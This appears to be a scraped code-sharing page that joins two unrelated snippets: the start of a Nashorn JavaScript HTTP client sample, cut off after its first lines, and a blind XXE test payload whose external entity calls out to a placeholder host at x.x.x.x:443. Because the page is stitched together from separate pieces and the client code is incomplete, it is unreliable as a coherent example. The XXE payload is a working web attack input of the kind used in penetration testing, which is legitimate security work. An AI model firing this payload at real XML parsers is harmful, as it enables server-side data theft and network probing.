billybong
/ nashorn javascript http client
Created
October 30, 2014 12:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env jjs | |
| /*#################################################################################################################################### | |
| # As Nashorn does not have http capabilities through XMLHttpRequest (DOM API), we have to use regular Java classes instead. | |
| # This sample shows how this can be acheived without depending on any third party libraries. Just a standard Java 8 JDK. | |
| # Make sure to have JAVA_HOME/bin on your PATH for the shebang to work. Then just chmod +x away and run... | |
| # Alternatively if you're on a non *nix OS, start with jjs -scritping httpsample.js | |
| ####################################################################################################################################*/ | |
| var url = "https://api.github.com/users/billybong/repos"; | |
| var response; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |